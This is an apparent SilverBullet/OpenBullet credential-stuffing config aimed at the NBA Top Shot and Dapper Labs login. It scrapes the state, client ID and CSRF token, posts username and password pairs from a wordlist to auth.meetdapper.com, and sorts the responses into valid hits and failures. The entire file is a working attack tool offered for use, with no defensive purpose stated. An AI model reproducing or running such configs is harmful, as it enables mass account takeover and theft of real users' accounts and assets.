[SETTINGS]
{
  "Name": "meetdapper",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-27T13:14:36.3630311+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "meetdapper",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://nbatopshot.com/api/auth0/login?screen_hint=login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<ADDRESS>" LR "state=" "&" -> VAR "state" 

PARSE "<ADDRESS>" LR "client=" "&" -> VAR "client" 

PARSE "<COOKIES(_csrf)>" LR "" "" -> VAR "csrf" 

REQUEST POST "https://auth.meetdapper.com/usernamepassword/login" 
  CONTENT "{\"client_id\":\"<client>\",\"redirect_uri\":\"https://nbatopshot.com/api/auth0/callback\",\"tenant\":\"dapperlabs\",\"response_type\":\"code\",\"scope\":\"openid profile offline_access email\",\"_csrf\":\"<csrf>\",\"state\":\"<state>\",\"_intstate\":\"deprecated\",\"username\":\"<USER>\",\"password\":\"<PASS>\",\"connection\":\"Username-Password-Authentication\"}" 
  CONTENTTYPE "application/json" 
  COOKIE "{\"client_id\": \"<client>\",\"redirect_uri\":\"https://nbatopshot.com/api/auth0/callback\",\"tenant\":\"dapperlabs\",\"response_type\":\"code\",\"scope\":\"openid profile offline_access email\",\"_csrf\":\"<csrf>\",\"state\":\"<state>\",\"_intstate\":\"deprecated\",\"username\":\"<USER>\",\"password\":\"<PASS>\",\"connection\":\"Username-Password-Authentication\"}" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Wrong email or password." 
    KEY "invalid_user_password" 
    KEY "invalid username" 
  KEYCHAIN Success AND 
    KEY "<SOURCE>" DoesNotContain "Wrong email or password." 

